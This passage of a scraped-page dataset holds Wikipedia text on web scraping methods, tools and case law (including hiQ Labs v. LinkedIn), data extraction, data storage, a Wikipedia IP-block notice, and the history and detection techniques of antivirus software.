by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
626 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Help:Introduction | Wikipedia is made by people like you. Get started Policies and Guidelines Editing Referencing Images Tables Editing Referencing Images Tables Talk pages Navigating WikipediaManual of StyleConclusion View all as single page For more training information, see also: Full help contents page Training for students A single-page guide to contributing A training adventure game Resources for new editors |
627 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=8 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
628 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_extraction | Data extraction is the act or process of retrieving data out of (usually unstructured or poorly structured) data sources for further data processing or data storage (data migration). The import into the intermediate extracting system is thus usually followed by data transformation and possibly the addition of metadata prior to export to another stage in the data workflow. Usually, the term data extraction is applied when (experimental) data is first imported into a computer from primary sources, like measuring or recording devices. Today's electronic devices will usually present an electrical connector (e.g. USB) through which 'raw data' can be streamed into a personal computer. Typical unstructured data sources include web pages, emails, documents, PDFs, social media, scanned text, mainframe reports, spool files, multimedia files, etc. Extracting data from these unstructured sources has grown into a considerable technical challenge, where as historically data extraction has had to deal with changes in physical hardware formats, the majority of current data extraction deals with extracting data from these unstructured data sources, and from different software formats. This growing process of data extraction from the web is referred to as "Web data extraction" or "Web scraping". The act of adding structure to unstructured data takes a number of forms |
629 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_storage | Data storage is the recording (storing) of information (data) in a storage medium. Handwriting, phonographic recording, magnetic tape, and optical discs are all examples of storage media. Biological molecules such as RNA and DNA are considered by some as data storage. 1 2 Recording may be accomplished with virtually any form of energy. Electronic data storage requires electrical power to store and retrieve data. Data storage in a digital, machine-readable medium is sometimes called digital data. Computer data storage is one of the core functions of a general-purpose computer. Electronic documents can be stored in much less space than paper documents. 3 Barcodes and magnetic ink character recognition (MICR) are two ways of recording machine-readable data on paper. A recording medium is a physical material that holds information. Newly created information is distributed and can be stored in four storage media print, film, magnetic, and optical and seen or heard in four information flows telephone, radio and TV, and the Internet 4 as well as being observed directly. Digital information is stored on electronic media in many different recording formats. With electronic media, the data and the recording media are sometimes referred to as "software" despite the more common use of the word to describe computer software. With (traditional art) static media, art materials such as crayons may be considered both equipment and medium as the wax, charcoal or chalk material from the equipment becomes part of the surface of the medium. Some recording media may be temporary either by design or by nature. Volatile organic compounds may be used to preserve the environment or to purposely make data expire over time. Data such as smoke signals or skywriting are temporary by nature. Depending on the volatility, a gas (e.g. atmosphere, smoke) or a liquid surface such as a lake would be considered a temporary recording medium if at all. A 2003 UC Berkeley report estimated that about five exabytes of new information were produced in 2002 and that 92% of this data was stored on hard disk drives. This was about twice the data produced in 2000. 5 The amount of data transmitted over telecommunication systems in 2002 was nearly 18 exabytes—three and a half times more than was recorded on non-volatile storage. Telephone calls constituted 98% of the telecommunicated information in 2002. The researchers' highest estimate for the growth rate of newly stored information (uncompressed) was more than 30% per year. In a more limited study, the International Data Corporation estimated that the total amount of digital data in 2007 was 281 exabytes, and that the total amount of digital data produced exceeded the global storage capacity for the first time. 6 A 2011 Science Magazine article estimated that the year 2002 was the beginning of the digital age for information storage: an age in which more information is stored on digital storage devices than on analog storage devices. 7 In 1986, approximately 1% of the world's capacity to store information was in digital format; this grew to 3% by 1993, to 25% by 2000, and to 97% by 2007. These figures correspond to less than three compressed exabytes in 1986, and 295 compressed exabytes in 2007. 7 The quantity of digital storage doubled roughly every three years. 8 It is estimated that around 120 zettabytes of data will be generated in 2023 update , an increase of 60x from 2010, and that it will increase to 181 zettabytes generated in 2025. 9 |
630 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/HiQ_Labs_v._LinkedIn | hiQ Labs, Inc. v. LinkedIn Corp., 938 F.3d 985 (9th Cir. 2019), was a United States Ninth Circuit case about web scraping. hiQ is a small data analytics company that used automated bots to scrape information from public LinkedIn profiles. LinkedIn used legal means to prevent this. hiQ Labs brought a case against LinkedIn in a district court, seeking an injunction against these means, which was granted. LinkedIn appealed. The 9th Circuit affirmed the district court's preliminary injunction, preventing LinkedIn from denying the plaintiff, hiQ Labs, from accessing LinkedIn's publicly available LinkedIn member profiles. However, after further appeal in another court, hiQ was found to be in breach of LinkedIn's terms, and there was a settlement. The 9th Circuit ruled that hiQ had the right to do web scraping. 1 2 3 However, the Supreme Court, based on its Van Buren v. United States decision, 4 vacated the decision and remanded the case for further review in June 2021. In a second ruling in April 2022 the Ninth Circuit affirmed its decision. 5 6 In November 2022 the U.S. District Court for the Northern District of California ruled that hiQ had breached LinkedIn's User Agreement and a settlement agreement was reached between the two parties. 7 LinkedIn served hiQ with a cease-and-desist, demanding that hiQ cease its activity of accessing and copying data from LinkedIn's server. hiQ filed suit against LinkedIn, seeking both injunctive relief under California law and a declaratory judgment to prevent LinkedIn from lawfully invoking the Computer Fraud and Abuse Act (CFAA), the Digital Millennium Copyright Act (DMCA), California Penal Code 502(c), or the common law of trespass against hiQ. The Ninth Circuit affirmed the district court's award of a preliminary injunction in hiQ's favor, finding that "hiQ established a likelihood of irreparable harm because the survival of its business was threatened. 8 The Ninth Circuit held that there was no abuse of discretion by the district court where the court had found that even if some LinkedIn users retained their privacy despite their public status, as they were not scraped, such privacy interests did not outweigh hiQ's interest in maintaining its business. In balancing the hardships, the Ninth Circuit determined it weighed in favor of hiQ. Further, the Ninth Circuit noted that hiQ posed serious concerns with regards to (1) the merits of its claim for tortious interference with contract, alleging that LinkedIn intentionally interfered with its contracts with third parties, and (2) the merits of LinkedIn’s legitimate business purpose defense. 8 Additionally, there was a serious contention as to whether the CFAA preempted hiQ's state law causes of action, specifically because the CFAA prohibits accessing a computer without authorization or exceeding one's authorization to obtain information from a protected computer. LinkedIn asserted that following the receipt of its cease-and-desist letter, hiQ's scraping and further use of its data without authorization fell within the meaning of "without authorization" within the CFAA. The Ninth Circuit affirmed the district court's finding that public interest favored the granting of a preliminary injunction. In his concurring opinion, Judge Wallace specified his concern about the appeal of a preliminary injunction initiated in order to obtain an appellate court's take on the merits. Ultimately, the Ninth Circuit's affirmation of the district court's grant of the preliminary injunction prohibited LinkedIn from denying hiQ access to publicly available data on public LinkedIn users' profiles. LinkedIn petitioned the Supreme Court to review the Ninth Circuit's decision. 9 In an order on June 14, 2021, 10 the Supreme Court vacated the Ninth Circuit's decision on the basis of their ruling on CFAA the week prior in Van Buren v. United States, which had ruled that the "exceeds authorized access" of CFAA only applies when an individual has valid access to a system but accesses parts of a system they are not intended to access. 4 The case was remanded to the Ninth Circuit for further review under Van Buren. 11 In a second ruling in April 2022 the Ninth Circuit affirmed its decision. 5 6 The Ninth Circuit's declaration that selectively banning potential competitors from accessing and using data that is publicly available can be considered unfair competition under California law may have large implication for antitrust law. citation needed Other countries with laws to prevent monopolistic practices or anti-trust laws may also see similar disputes and prospectively judgements hailing commercial use of publicly accessible information. While there is global precedence by virtue of large companies such as Thomson Reuters, Bloomberg or Google effectively using web-scraping or crawling to aggregate information from disparate sources across the web, fundamentally the judgement by Ninth Circuit fortifies the lack of enforceability of browse-wrap agreements over conduct of trade using publicly available information. |
631 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Antivirus_software | Antivirus software (abbreviated to AV software), also known as anti-malware, is a computer program used to prevent, detect, and remove malware. Antivirus software was originally developed to detect and remove computer viruses, hence the name. However, with the proliferation of other malware, antivirus software started to protect against other computer threats. Some products also include protection from malicious URLs, spam, and phishing. 1 The first known computer virus appeared in 1971 and was dubbed the "Creeper virus". 2 This computer virus infected Digital Equipment Corporation's (DEC) PDP 10 mainframe computers running the TENEX operating system. 3 4 The Creeper virus was eventually deleted by a program created by Ray Tomlinson and known as "The Reaper". 5 Some people consider "The Reaper" the first antivirus software ever written it may be the case, but it is important to note that the Reaper was actually a virus itself specifically designed to remove the Creeper virus. 5 6 The Creeper virus was followed by several other viruses. The first known that appeared "in the wild" was "Elk Cloner", in 1981, which infected Apple II computers. 7 8 9 In 1983, the term "computer virus" was coined by Fred Cohen in one of the first ever published academic papers on computer viruses. 10 Cohen used the term "computer virus" to describe programs that: "affect other computer programs by modifying them in such a way as to include a (possibly evolved) copy of itself. 11 (note that a more recent definition of computer virus has been given by the Hungarian security researcher P ter Sz r: "a code that recursively replicates a possibly evolved copy of itself"). 12 13 The first IBM PC compatible "in the wild" computer virus, and one of the first real widespread infections, was "Brain" in 1986. From then, the number of viruses has grown exponentially. 14 15 Most of the computer viruses written in the early and mid 1980s were limited to self-reproduction and had no specific damage routine built into the code. That changed when more and more programmers became acquainted with computer virus programming and created viruses that manipulated or even destroyed data on infected computers. 16 Before internet connectivity was widespread, computer viruses were typically spread by infected floppy disks. Antivirus software came into use, but was updated relatively infrequently. During this time, virus checkers essentially had to check executable files and the boot sectors of floppy disks and hard disks. However, as internet usage became common, viruses began to spread online. 17 There are competing claims for the innovator of the first antivirus product. Possibly, the first publicly documented removal of an "in the wild" computer virus (the "Vienna virus") was performed by Bernd Fix in 1987. 18 19 In 1987, Andreas L ning and Kai Figge, who founded G Data Software in 1985, released their first antivirus product for the Atari ST platform. 20 In 1987, the Ultimate Virus Killer (UVK) was also released. 21 This was the de facto industry standard virus killer for the Atari ST and Atari Falcon, the last version of which (version 9.0) was released in April 2004. citation needed In 1987, in the United States, John McAfee founded the McAfee company and, at the end of that year, he released the first version of VirusScan. 22 Also in 1987 (in Czechoslovakia), Peter Pa ko, Rudolf Hrub , and Miroslav Trnka created the first version of NOD antivirus. 23 24 In 1987, Fred Cohen wrote that there is no algorithm that can perfectly detect all possible computer viruses. 25 Finally, at the end of 1987, the first two heuristic antivirus utilities were released: Flushot Plus by Ross Greenberg 26 27 28 and Anti4us by Erwin Lanting. 29 In his O'Reilly book, Malicious Mobile Code: Virus Protection for Windows, Roger Grimes described Flushot Plus as "the first holistic program to fight malicious mobile code (MMC). 30 However, the kind of heuristic used by early AV engines was totally different from those used today. The first product with a heuristic engine resembling modern ones was F-PROT in 1991. 31 Early heuristic engines were based on dividing the binary into different sections: data section, code section (in a legitimate binary, it usually starts always from the same location). Indeed, the initial viruses re-organized the layout of the sections, or overrode the initial portion of a section in order to jump to the very end of the file where malicious code was located—only going back to resume execution of the original code. This was a very specific pattern, not used at the time by any legitimate software, which represented an elegant heuristic to catch suspicious code. Other kinds of more advanced heuristics were later added, such as suspicious section names, incorrect header size, regular expressions, and partial pattern in-memory matching. In 1988, the growth of antivirus companies continued. In Germany, Tjark Auerbach founded Avira (H BEDV at the time) and released the first version of AntiVir (named "Luke Filewalker" at the time). In Bulgaria, Vesselin Bontchev released his first freeware antivirus program (he later joined FRISK Software). Also Frans Veldman released the first version of ThunderByte Antivirus, also known as TBAV (he sold his company to Norman Safeground in 1998). In Czechoslovakia, Pavel Baudi and Eduard Ku era founded Avast Software (at the time ALWIL Software) and released their first version of avast antivirus. In June 1988, in South Korea, Ahn Cheol-Soo released its first antivirus software, called V1 (he founded AhnLab later in 1995). Finally, in autumn 1988, in the United Kingdom, Alan Solomon founded S S International and created his Dr. Solomon's Anti-Virus Toolkit (although he launched it commercially only in 1991 in 1998 Solomon's company was acquired by McAfee). In November 1988 a professor at the Panamerican University in Mexico City named Alejandro E. Carriles copyrighted the first antivirus software in Mexico under the name "Byte Matabichos" (Byte Bugkiller) to help solve the rampant virus infestation among students. 32 Also in 1988, a mailing list named VIRUS-L 33 was started on the BITNET EARN network where new viruses and the possibilities of detecting and eliminating viruses were discussed. Some members of this mailing list were: Alan Solomon, Eugene Kaspersky (Kaspersky Lab), Fri rik Sk lason (FRISK Software), John McAfee (McAfee), Luis Corrons (Panda Security), Mikko Hypp nen (F-Secure), P ter Sz r, Tjark Auerbach (Avira) and Vesselin Bontchev (FRISK Software). 33 In 1989, in Iceland, Fri rik Sk lason created the first version of F-PROT Anti-Virus (he founded FRISK Software only in 1993). Meanwhile, in the United States, Symantec (founded by Gary Hendrix in 1982) launched its first Symantec antivirus for Macintosh (SAM). 34 35 SAM 2.0, released March 1990, incorporated technology allowing users to easily update SAM to intercept and eliminate new viruses, including many that didn't exist at the time of the program's release. 36 In the end of the 1980s, in United Kingdom, Jan Hruska and Peter Lammer founded the security firm Sophos and began producing their first antivirus and encryption products. In the same period, in Hungary, also VirusBuster was founded (which has recently being incorporated by Sophos). In 1990, in Spain, Mikel Urizarbarrena founded Panda Security (Panda Software at the time). 37 In Hungary, the security researcher P ter Sz r released the first version of Pasteur antivirus. In Italy, Gianfranco Tonello created the first version of VirIT eXplorer antivirus, then founded TG Soft one year later. 38 In 1990, the Computer Antivirus Research Organization (CARO) was founded. In 1991, CARO released the "Virus Naming Scheme", originally written by Fri rik Sk lason and Vesselin Bontchev. 39 Although this naming scheme is now outdated, it remains the only existing standard that most computer security companies and researchers ever attempted to adopt. CARO members includes: Alan Solomon, Costin Raiu, Dmitry Gryaznov, Eugene Kaspersky, Fri rik Sk lason, Igor Muttik, Mikko Hypp nen, Morton Swimmer, Nick FitzGerald, Padgett Peterson, Peter Ferrie, Righard Zwienenberg and Vesselin Bontchev. 40 41 In 1991, in the United States, Symantec released the first version of Norton AntiVirus. In the same year, in the Czech Republic, Jan Gritzbach and Tom Hofer founded AVG Technologies (Grisoft at the time), although they released the first version of their Anti-Virus Guard (AVG) only in 1992. On the other hand, in Finland, F-Secure (founded in 1988 by Petri Allas and Risto Siilasmaa with the name of Data Fellows) released the first version of their antivirus product. F-Secure claims to be the first antivirus firm to establish a presence on the World Wide Web. 42 In 1991, the European Institute for Computer Antivirus Research (EICAR) was founded to further antivirus research and improve development of antivirus software. 43 44 In 1992, in Russia, Igor Danilov released the first version of SpiderWeb, which later became Dr.Web. 45 In 1994, AV-TEST reported that there were 28,613 unique malware samples (based on MD5) in their database. 46 Over time other companies were founded. In 1996, in Romania, Bitdefender was founded and released the first version of Anti-Virus eXpert (AVX). 47 In 1997, in Russia, Eugene Kaspersky and Natalya Kaspersky co-founded security firm Kaspersky Lab. 48 In 1996, there was also the first "in the wild" Linux virus, known as "Staog". 49 In 1999, AV-TEST reported that there were 98,428 unique malware samples (based on MD5) in their database. 46 In 2000, Rainer Link and Howard Fuhs started the first open source antivirus engine, called OpenAntivirus Project. 50 In 2001, Tomasz Kojm released the first version of ClamAV, the first ever open source antivirus engine to be commercialised. In 2007, ClamAV was bought by Sourcefire, 51 which in turn was acquired by Cisco Systems in 2013. 52 In 2002, in United Kingdom, Morten Lund and Theis S ndergaard co-founded the antivirus firm BullGuard. 53 In 2005, AV-TEST reported that there were 333,425 unique malware samples (based on MD5) in their database. 46 In 2007, AV-TEST reported a number of 5,490,960 new unique malware samples (based on MD5) only for that year. 46 In 2012 and 2013, antivirus firms reported a new malware samples range from 300,000 to over 500,000 per day. 54 55 Over the years it has become necessary for antivirus software to use several different strategies (e.g. specific email and network protection or low level modules) and detection algorithms, as well as to check an increasing variety of files, rather than just executables, for several reasons: In 2005, F-Secure was the first security firm that developed an Anti-Rootkit technology, called BlackLight. Because most users are usually connected to the Internet on a continual basis, Jon Oberheide first proposed a Cloud-based antivirus design in 2008. 59 In February 2008 McAfee Labs added the industry-first cloud-based anti-malware functionality to VirusScan under the name Artemis. It was tested by AV-Comparatives in February 2008 60 and officially unveiled in August 2008 in McAfee VirusScan. 61 Cloud AV created problems for comparative testing of security software part of the AV definitions was out of testers control (on constantly updated AV company servers) thus making results non-repeatable. As a result, Anti-Malware Testing Standards Organisation (AMTSO) started working on method of testing cloud products which was adopted on May 7, 2009. 62 In 2011, AVG introduced a similar cloud service, called Protective Cloud Technology. 63 Following the 2013 release of the APT 1 report from Mandiant, the industry has seen a shift towards signature-less approaches to the problem capable of detecting and mitigating zero-day attacks. 64 Numerous approaches to address these new forms of threats have appeared, including behavioral detection, artificial intelligence, machine learning, and cloud-based file detection. According to Gartner, it is expected the rise of new entrants, such Carbon Black, Cylance and Crowdstrike will force end point protection incumbents into a new phase of innovation and acquisition. 65 One method from Bromium involves micro-virtualization to protect desktops from malicious code execution initiated by the end user. Another approach from SentinelOne and Carbon Black focuses on behavioral detection by building a full context around every process execution path in real time, 66 67 while Cylance leverages an artificial intelligence model based on machine learning. 68 Increasingly, these signature-less approaches have been defined by the media and analyst firms as "next-generation" antivirus 69 and are seeing rapid market adoption as certified antivirus replacement technologies by firms such as Coalfire and DirectDefense. 70 In response, traditional antivirus vendors such as Trend Micro, 71 Symantec and Sophos 72 have responded by incorporating "next-gen" offerings into their portfolios as analyst firms such as Forrester and Gartner have called traditional signature-based antivirus "ineffective" and "outdated". 73 As of Windows 8, Windows includes its own free antivirus protection under the Windows Defender brand. Despite bad detection scores in its early days, AV-Test now certifies Defender as one of its top products. 74 75 While it isn't publicly known how the inclusion of antivirus software in Windows affected antivirus sales, Google search traffic for antivirus has declined significantly since 2010. 76 In 2014 Microsoft bought McAfee. 77 Since 2016, there has been a notable amount of consolidation in the industry. Avast purchased AVG in 2016 for $1.3 billion. 78 Avira was acquired by Norton owner Gen Digital (then NortonLifeLock) in 2020 for $360 million. 79 In 2021, the Avira division of Gen Digital acquired BullGuard. 80 The BullGuard brand was discontinued in 2022 and its customers were migrated to Norton. In 2022, Gen Digital acquired Avast, effectively consolidating four major antivirus brands under one owner. 81 In 1987, Frederick B. Cohen demonstrated that the algorithm which would be able to detect all possible viruses can't possibly exist (like the algorithm which determines whether or not the given program halts). 25 However, using different layers of defense, a good detection rate may be achieved. There are several methods which antivirus engines can use to identify malware: Traditional antivirus software relies heavily upon signatures to identify malware. 99 Substantially, when a malware sample arrives in the hands of an antivirus firm, it is analysed by malware researchers or by dynamic analysis systems. Then, once it is determined to be a malware, a proper signature of the file is extracted and added to the signatures database of the antivirus software. 100 Although the signature-based approach can effectively contain malware outbreaks, malware authors have tried to stay a step ahead of such software by writing "oligomorphic", "polymorphic" and, more recently, "metamorphic" viruses, which encrypt parts of themselves or otherwise modify themselves as a method of disguise, so as to not match virus signatures in the dictionary. 101 Many viruses start as a single infection and through either mutation or refinements by other attackers, can grow into dozens of slightly different strains, called variants. Generic detection refers to the detection and removal of multiple threats using a single virus definition. 102 For example, the Vundo trojan has several family members, depending on the antivirus vendor's classification. Symantec classifies members of the Vundo family into two distinct categories, Trojan.Vundo and Trojan.Vundo.B. 103 104 While it may be advantageous to identify a specific virus, it can be quicker to detect a virus family through a generic signature or through an inexact match to an existing signature. Virus researchers find common areas that all viruses in a family share uniquely and can thus create a single generic signature. These signatures often contain non-contiguous code, using wildcard characters where differences lie. These wildcards allow the scanner to detect viruses even if they are padded with extra, meaningless code. 105 A detection that uses this method is said to be "heuristic detection". Anti-virus software can attempt to scan for rootkits. A rootkit is a type of malware designed to gain administrative-level control over a computer system without being detected. Rootkits can change how the operating system functions and in some cases can tamper with the anti-virus program and render it ineffective. Rootkits are also difficult to remove, in some cases requiring a complete re-installation of the operating system. 106 Real-time protection, on-access scanning, background guard, resident shield, autoprotect, and other synonyms refer to the automatic protection provided by most antivirus, anti-spyware, and other anti-malware programs. This monitors computer systems for suspicious activity such as computer viruses, spyware, adware, and other malicious objects. Real-time protection detects threats in opened files and scans apps in real-time as they are installed on the device. 107 When inserting a CD, opening an email, or browsing the web, or when a file already on the computer is opened or executed. 108 Some commercial antivirus software end-user license agreements include a clause that the subscription will be automatically renewed, and the purchaser's 